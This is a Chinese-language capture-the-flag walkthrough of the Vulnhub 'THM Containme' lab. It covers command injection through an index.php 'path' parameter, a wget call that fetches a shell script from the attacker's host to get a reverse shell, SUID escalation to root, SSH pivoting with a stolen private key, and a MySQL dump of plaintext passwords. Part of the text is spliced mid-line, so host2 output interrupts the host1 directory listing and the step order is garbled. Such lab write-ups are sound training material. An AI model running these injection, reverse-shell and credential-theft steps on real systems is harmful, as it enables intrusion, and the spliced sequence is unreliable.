首页 > 其他分享 >Vulnhub THM Containme靶机解题过程

Vulnhub THM Containme靶机解题过程

时间:2022-11-06 18:22:09浏览次数:64  
标签:4.0 -- drwxr THM Vulnhub xr Containme root 2021

THM Containme v4

识别目标主机IP地址

VirtualBox中启动THM Containme 靶机 kali Linux利用netdiscover识别其IP地址:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.93.0/16   |   Screen View: Unique Hosts                                                                                                                                                                      
                                                                                                                                                                                                                                          
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:f8:f5:bb      1      60  PCS Systemtechnik GmbH 

发现无法识别目标主机的IP地址,表中的两个IP地址并非率属于靶机。

因此需要首先解决靶机没有获取IP地址的问题:

重新启动靶机,一直按着Shift键,知道出现下面的界面:

然后按e键进入编辑模式,找到ro所在行,将ro改成rw single init=/bin/bash, 并把所在行的后面内容删除

按着Ctrl+x键重启靶机,ip a 命令得到网卡的名称,然后利用vi修改/etc/netplan/01-netcfg.yaml中的网卡名称,使其保持一致,然后重启靶机。

靶机没有分配到IP地址的问题得到解决:

(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.4.0/16   |   Screen View: Unique Hosts                                                                                                                                                                        
                                                                                                                                                                                                                                          
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:f8:f5:bb      2     120  PCS Systemtechnik GmbH                                                                                                                                                                 
 192.168.56.154  08:00:27:d0:a0:36      1      60  PCS Systemtechnik GmbH                                                                                                                                                                 


NMAP扫描

──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.154 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-06 02:49 EST
Nmap scan report for bogon (192.168.56.154)
Host is up (0.00014s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:3e:80:d9:b0:98:fd:7e:09:6d:34:12:f9:15:8a:18 (RSA)
|   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open  EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
|   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
|_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
MAC Address: 08:00:27:D0:A0:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.36 seconds

Get Access

浏览器访问: http://192.168.56.154,返回的是apche默认页面,源代码没有有价值的信息。

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/robots.txt   
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.154 Port 80</address>
</body></html>

                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ gobuster dir -u http://192.168.56.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/06 02:55:59 Starting gobuster in directory enumeration mode
===============================================================
Progress: 218865 / 220561 (99.23%)===============================================================
2022/11/06 02:56:31 Finished
===============================================================
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ gobuster dir -u http://192.168.56.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
===============================================================
2022/11/06 02:58:25 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 329]
/info.php             (Status: 200) [Size: 68960]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 1102308 / 1102805 (99.95%)===============================================================
2022/11/06 03:01:57 Finished
===============================================================
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ nikto -h http://192.168.56.154     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.154
+ Target Hostname:    192.168.56.154
+ Target Port:        80
+ Start Time:         2022-11-06 03:04:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24-0ubuntu0.18.04.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.html, /index.php
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c730c0d1fa4e, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-11-06 03:04:53 (GMT-5) (52 seconds)
---------------------------------------------------------------------------

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php    
<html>
<body>
        <pre>
        total 28K
drwxr-xr-x 2 root root 4.0K Jul 16  2021 .
drwxr-xr-x 3 root root 4.0K Jul 15  2021 ..
-rw-r--r-- 1 root root  11K Jul 15  2021 index.html
-rw-r--r-- 1 root root  154 Jul 16  2021 index.php
-rw-r--r-- 1 root root   20 Jul 15  2021 info.php
        <pre>

<!--  where is the path ?  -->

</body>
</html>

返回页面提示: where is the path,可能这个页面有参数可以FUZZ

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ wfuzz -c -u http://192.168.56.154/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 60
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.154/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000003025:   200        11 L     22 W       149 Ch      "path"                                                                                                                                                                     
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 4587
Filtered Requests: 4586
Requests/sec.: 0

发现了参数path,手动确认一下:

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/
<html>
<body>
        <pre>
        total 676K
drwxr-xr-x 81 root root   4.0K Jul 30  2021 .
drwxr-xr-x 22 root root   4.0K Jul 15  2021 ..
-rw-------  1 root root      0 Jun 29  2021 .pwd.lock
drwxr-xr-x  3 root root   4.0K Jun 29  2021 NetworkManager
drwxr-xr-x  3 root root   4.0K Jun 29  2021 X11
drwxr-xr-x  3 root root   4.0K Jun 29  2021 acpi
-rw-r--r--  1 root root   3.0K Jun 29  2021 adduser.conf
drwxr-xr-x  2 root root   4.0K Jul 16  2021 alternatives
drwxr-xr-x  8 root root   4.0K Jul 19  2021 apache2
drwxr-xr-x  3 root root   4.0K Jun 29  2021 apparmor
drwxr-xr-x  9 root root   4.0K Jun 29  2021 apparmor.d
drwxr-xr-x  3 root root   4.0K Jun 29  2021 apport
drwxr-xr-x  7 root root   4.0K Jun 29  2021 apt
-rw-r-----  1 root daemon  144 Feb 20  2018 at.deny
-rw-r--r--  1 root root   2.3K Apr  4  2018 bash.bashrc
drwxr-xr-x  2 root root   4.0K Jun 29  2021 bash_completion.d
-rw-r--r--  1 root root    367 Jan 27  2016 bindresvport.blacklist
drwxr-xr-x  2 root root   4.0K May 27  2021 binfmt.d
drwxr-xr-x  3 root root   4.0K Jun 29  2021 ca-certificates
-rw-r--r--  1 root root   5.6K Jun 29  2021 ca-certificates.conf
drwxr-xr-x  4 root root   4.0K Jun 29  2021 cloud
drwxr-xr-x  2 root root   4.0K Jun 29  2021 console-setup
drwxr-xr-x  2 root root   4.0K Jul 15  2021 cron.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 cron.daily
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cron.hourly
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cron.monthly
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cron.weekly
-rw-r--r--  1 root root    722 Nov 15  2017 crontab
drwxr-xr-x  2 root root   4.0K Jun 29  2021 cryptsetup-initramfs
-rw-r--r--  1 root root     54 Jun 29  2021 crypttab
drwxr-xr-x  4 root root   4.0K Jun 29  2021 dbus-1
-rw-r--r--  1 root root   2.9K Feb 28  2018 debconf.conf
-rw-r--r--  1 root root     11 Jun 25  2017 debian_version
drwxr-xr-x  3 root root   4.0K Jul 15  2021 default
-rw-r--r--  1 root root    604 Aug 13  2017 deluser.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 depmod.d
drwxr-xr-x  4 root root   4.0K Jun 29  2021 dhcp
drwxr-xr-x  2 root root   4.0K Jun 29  2021 dnsmasq.d
drwxr-xr-x  2 root root   4.0K Jun 29  2021 dnsmasq.d-available
drwxr-xr-x  4 root root   4.0K Jun 29  2021 dpkg
-rw-r--r--  1 root root     35 Jun 29  2021 ec2_version
-rw-r--r--  1 root root    106 Jun 29  2021 environment
-rw-r--r--  1 root root   1.3K Jun 28  2018 ethertypes
-rw-r--r--  1 root root     43 Jun 29  2021 fstab
-rw-r--r--  1 root root    280 Jun 20  2014 fuse.conf
-rw-r--r--  1 root root   2.6K Feb  1  2018 gai.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 groff
-rw-r--r--  1 root root    639 Jul 19  2021 group
-rw-r--r--  1 root root    720 Jul 15  2021 group-
-rw-r-----  1 root shadow  530 Jul 19  2021 gshadow
-rw-r-----  1 root shadow  607 Jul 15  2021 gshadow-
drwxr-xr-x  3 root root   4.0K Jun 29  2021 gss
-rw-r--r--  1 root root     92 Apr  9  2018 host.conf
-rw-r--r--  1 root root      6 Jul 14  2021 hostname
-rw-r--r--  1 root root    221 Jun 28  2021 hosts
-rw-r--r--  1 root root    411 Jun 29  2021 hosts.allow
-rw-r--r--  1 root root    711 Jun 29  2021 hosts.deny
drwxr-xr-x  2 root root   4.0K Jul 30  2021 init.d
-rw-r--r--  1 root root   1.8K May 15  2017 inputrc
drwxr-xr-x  4 root root   4.0K Jun 29  2021 iproute2
drwxr-xr-x  2 root root   4.0K Jun 29  2021 iscsi
-rw-r--r--  1 root root     26 Aug 13  2020 issue
-rw-r--r--  1 root root     19 Aug 13  2020 issue.net
drwxr-xr-x  4 root root   4.0K Jun 29  2021 kernel
-rw-r--r--  1 root root    110 Jun 29  2021 kernel-img.conf
-rw-r--r--  1 root root    18K Jul 30  2021 ld.so.cache
-rw-r--r--  1 root root     34 Jan 27  2016 ld.so.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 ld.so.conf.d
drwxr-xr-x  2 root root   4.0K Jun 29  2021 ldap
-rw-r--r--  1 root root    267 Apr  9  2018 legal
-rw-r--r--  1 root root    191 Feb  7  2018 libaudit.conf
lrwxrwxrwx  1 root root     30 Jul 15  2021 localtime -> /usr/share/zoneinfo/US/Central
drwxr-xr-x  4 root root   4.0K Jun 29  2021 logcheck
-rw-r--r--  1 root root    11K Jan 25  2018 login.defs
drwxr-xr-x  2 root root   4.0K Jul 15  2021 logrotate.d
-rw-r--r--  1 root root    105 Aug 13  2020 lsb-release
drwxr-xr-x  3 root root   4.0K Jun 29  2021 lvm
-r--r--r--  1 root root     33 Jul 14  2021 machine-id
-rw-r--r--  1 root root    111 May 12  2020 magic
-rw-r--r--  1 root root    111 May 12  2020 magic.mime
-rw-r--r--  1 root root   1.9K Jun 29  2021 mailcap
-rw-r--r--  1 root root    449 Jul 15  2016 mailcap.order
drwxr-xr-x  2 root root   4.0K Jun 29  2021 mdadm
-rw-r--r--  1 root root    24K Jul 15  2016 mime.types
-rw-r--r--  1 root root    812 Mar 24  2018 mke2fs.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 modprobe.d
-rw-r--r--  1 root root    195 Jun 29  2021 modules
drwxr-xr-x  2 root root   4.0K Jul 30  2021 modules-load.d
lrwxrwxrwx  1 root root     19 Jun 29  2021 mtab -> ../proc/self/mounts
-rw-r--r--  1 root root   8.9K Feb 13  2018 nanorc
drwxr-xr-x  2 root root   4.0K Jul 15  2021 netplan
drwxr-xr-x  4 root root   4.0K Jun 29  2021 network
drwxr-xr-x  6 root root   4.0K Jun 29  2021 networkd-dispatcher
-rw-r--r--  1 root root     91 Apr  9  2018 networks
-rw-r--r--  1 root root    513 Jun 29  2021 nsswitch.conf
drwxr-xr-x  2 root root   4.0K Jun 29  2021 opt
lrwxrwxrwx  1 root root     21 Aug 13  2020 os-release -> ../usr/lib/os-release
-rw-r--r--  1 root root    112 Jun 29  2021 overlayroot.local.conf
-rw-r--r--  1 root root    552 Apr  4  2018 pam.conf
drwxr-xr-x  2 root root   4.0K Jul 30  2021 pam.d
-rw-r--r--  1 root root   1.4K Jul 19  2021 passwd
-rw-r--r--  1 root root   1.5K Jul 16  2021 passwd-
drwxr-xr-x  4 root root   4.0K Jun 29  2021 perl
drwxr-xr-x  3 root root   4.0K Jul 15  2021 php
drwxr-xr-x  3 root root   4.0K Jun 29  2021 pm
drwxr-xr-x  2 root root   4.0K Jun 29  2021 pollinate
-rw-r--r--  1 root root    596 Jul 15  2021 profile
drwxr-xr-x  2 root root   4.0K Jun 29  2021 profile.d
-rw-r--r--  1 root root   2.9K Dec 25  2016 protocols
drwxr-xr-x  2 root root   4.0K Jun 29  2021 python3
drwxr-xr-x  2 root root   4.0K Jun 29  2021 python3.6
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc0.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc1.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc2.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc3.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc4.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc5.d
drwxr-xr-x  2 root root   4.0K Jul 15  2021 rc6.d
drwxr-xr-x  2 root root   4.0K Jun 29  2021 rcS.d
lrwxrwxrwx  1 root root     39 Jun 29  2021 resolv.conf -> ../run/systemd/resolve/stub-resolv.conf
-rwxr-xr-x  1 root root    268 Jul 21  2017 rmt
-rw-r--r--  1 root root    887 Dec 25  2016 rpc
drwxr-xr-x  2 root root   4.0K Jun 29  2021 rsyslog.d
-rw-r--r--  1 root root   4.1K Jan 25  2018 securetty
drwxr-xr-x  4 root root   4.0K Jun 29  2021 security
drwxr-xr-x  2 root root   4.0K Jun 29  2021 selinux
-rw-r--r--  1 root root    19K Dec 25  2016 services
-rw-r-----  1 root shadow  841 Jul 19  2021 shadow
-rw-r-----  1 root shadow  966 Jul 15  2021 shadow-
-rw-r--r--  1 root root     73 Jun 29  2021 shells
drwxr-xr-x  2 root root   4.0K Jun 29  2021 skel
drwxr-xr-x  6 root root   4.0K Jun 29  2021 sos
drwxr-xr-x  2 root root   4.0K Jul 15  2021 ssh
drwxr-xr-x  4 root root   4.0K Jun 29  2021 ssl
-rw-r--r--  1 root root     53 Jul 19  2021 subgid
-rw-r--r--  1 root root     73 Jul 15  2021 subgid-
-rw-r--r--  1 root root     53 Jul 19  2021 subuid
-rw-r--r--  1 root root     73 Jul 15  2021 subuid-
-r--r-----  1 root root    755 Jan 19  2021 sudoers
drwxr-x---  2 root root   4.0K Jul 14  2021 sudoers.d
-rw-r--r--  1 root root   2.7K Jan 17  2018 sysctl.conf
drwxr-xr-x  2 root root   4.0K Jul 30  2021 sysctl.d
drwxr-xr-x  5 root root   4.0K Jul 30  2021 systemd
drwxr-xr-x  2 root root   4.0K Jun 29  2021 terminfo
-rw-r--r--  1 root root     11 Jul 15  2021 timezone
drwxr-xr-x  2 root root   4.0K Jun 29  2021 tmpfiles.d
-rw-r--r--  1 root root   1.3K Feb 25  2018 ucf.conf
drwxr-xr-x  4 root root   4.0K Jul 30  2021 udev
drwxr-xr-x  3 root root   4.0K Jun 29  2021 ufw
drwxr-xr-x  3 root root   4.0K Jun 29  2021 update-manager
drwxr-xr-x  2 root root   4.0K Jun 29  2021 update-motd.d
drwxr-xr-x  2 root root   4.0K May 14  2021 update-notifier
-rw-r--r--  1 root root   4.9K Apr  8  2019 wgetrc
drwxr-xr-x  4 root root   4.0K Jun 29  2021 xdg
        <pre>

<!--  where is the path ?  -->

</body>
</html>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/passwd
<html>
<body>
        <pre>
        -rw-r--r-- 1 root root 1.4K Jul 19  2021 ../../../../../../../etc/passwd
        <pre>

<!--  where is the path ?  -->

</body>
</html>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ 

脚本的功能应该不是显示文件内容,而是ls -alh

做命令组合

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl http://192.168.56.154/index.php?path=../../../../../../../etc/passwd
<html>
<body>
        <pre>
        -rw-r--r-- 1 root root 1.4K Jul 19  2021 ../../../../../../../etc/passwd
        <pre>

<!--  where is the path ?  -->

</body>
</html>

                                                                                                                                                                                                                                            

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl "http://192.168.56.154/index.php?path=../../../../../../../etc/passwd;id"                      
<html>
<body>
        <pre>
        -rw-r--r-- 1 root root 1.4K Jul 19  2021 ../../../../../../../etc/passwd
uid=33(www-data) gid=33(www-data) groups=33(www-data)
        <pre>

<!--  where is the path ?  -->

</body>
</html>



注意完整URL要加上引号,否则id会执行本地的Kali命令

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ curl "http://192.168.56.154/index.php?path=../../../../../../../etc/passwd;cat /etc/passwd"
curl: (3) URL using bad/illegal format or missing URL

似乎不能执行cat命令

接下来看能不能建立反向shell

不能直接利用命令建立shell,在Kali 本地建立shell.sh脚本,然后上传到目标靶机

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.154 - - [06/Nov/2022 03:24:42] "GET /shell.sh HTTP/1.1" 200 -

http://192.168.56.154/index.php?path=../../../../../../../etc/;wget%20-P%20/tmp%20http://192.168.56.137:8000/shell.sh

成功的拿到了shell

┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.154] 40230
bash: cannot set terminal process group (243): Inappropriate ioctl for device
bash: no job control in this shell
www-data@host1:/var/www/html$ 

www-data@host1:/var/www/html$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/var/www/html$ cd /usr/share/man/zh_TW
cd /usr/share/man/zh_TW
www-data@host1:/usr/share/man/zh_TW$ ./crypt mike
./crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

id
id
root@host1:/usr/share/man/zh_TW# id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@host1:/usr/share/man/zh_TW# 

似乎在容器中。

www-data@host1:/home/mike$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/home/mike$ cd /usr/share/man/zh_TW
cd /usr/share/man/zh_TW
www-data@host1:/usr/share/man/zh_TW$ ./crypt mike
./crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

idroot@host1:/usr/share/man/zh_TW# 
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@host1:/usr/share/man/zh_TW# cd home
cd home
bash: cd: home: No such file or directory
root@host1:/usr/share/man/zh_TW# cd /home
cd /home
root@host1:/home# ls
ls
mike
root@host1:/home# cd mike
cd mike
root@host1:/home/mike# ls -alh
ls -alh
total 384K
drwxr-xr-x 5 mike mike 4.0K Jul 30  2021 .
drwxr-xr-x 3 root root 4.0K Jul 19  2021 ..
lrwxrwxrwx 1 root mike    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Apr  4  2018 .bashrc
drwx------ 2 mike mike 4.0K Jul 30  2021 .cache
drwx------ 3 mike mike 4.0K Jul 30  2021 .gnupg
-rw-r--r-- 1 mike mike  807 Apr  4  2018 .profile
drwx------ 2 mike mike 4.0K Jul 19  2021 .ssh
-rwxr-xr-x 1 mike mike 351K Jul 30  2021 1cryptupx
root@host1:/home/mike# cd .ssh
cd .ssh
root@host1:/home/mike/.ssh# ls -alh
ls -alh
total 16K
drwx------ 2 mike mike 4.0K Jul 19  2021 .
drwxr-xr-x 5 mike mike 4.0K Jul 30  2021 ..
-rw------- 1 mike mike 1.7K Jul 15ul 15  2021 .ssh
-rw-r--r--  1 root root   32 Jul 16  2021 mike
-rw-------  1 root root  218 Jul 16  2021 mike.zip
root@host2:~# cat mike
cat mike
THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
root@host2:~# 

因为靶机里没有nmap,需要设法将nmap上传至靶机,而靶机没有internet环境

需要设法将Nmap上传至目标。

  2021 id_rsa
-rw-r--r-- 1 mike mike  392 Jul 15  2021 id_rsa.pub
root@host1:/home/mike/.ssh# ssh -i id_rsa [email protected]
ssh -i id_rsa [email protected]
The authenticity of host '172.16.20.6 (172.16.20.6)' can't be established.
ECDSA key fingerprint is SHA256:L1BKa1sC+LgClbpAX5jJvzYALuhUDf1zEzhPc/C++/8.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '172.16.20.6' (ECDSA) to the list of known hosts.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
mike@host2:~$ id
id
uid=1001(mike) gid=1001(mike) groups=1001(mike)
mike@host2:~$ ss -tunlp
ss -tunlp
Netid  State    Recv-Q   Send-Q      Local Address:Port     Peer Address:Port   
udp    UNCONN   0        0           127.0.0.53%lo:53            0.0.0.0:*      
tcp    LISTEN   0        80              127.0.0.1:3306          0.0.0.0:*      
tcp    LISTEN   0        128         127.0.0.53%lo:53            0.0.0.0:*      
tcp    LISTEN   0        128               0.0.0.0:22            0.0.0.0:*      
tcp    LISTEN   0        128                  [::]:22               [::]:*      
mike@host2:~$ mysql -umkike -ppassword
mysql -umkike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'mkike'@'localhost' (using password: YES)
mike@host2:~$ mysql -umike -ppassword
mysql -umike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| accounts           |
+--------------------+
2 rows in set (0.01 sec)

mysql> use accounts;
use accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+--------------------+
| Tables_in_accounts |
+--------------------+
| users              |
+--------------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+-------+---------------------+
| login | password            |
+-------+---------------------+
| root  | bjsig4868fgjjeog    |
| mike  | WhatAreYouDoingHere |
+-------+---------------------+
2 rows in set (0.00 sec)

mysql> quit
quit
Bye
mike@host2:~$ su - root
su - root
Password: bjsig4868fgjjeog

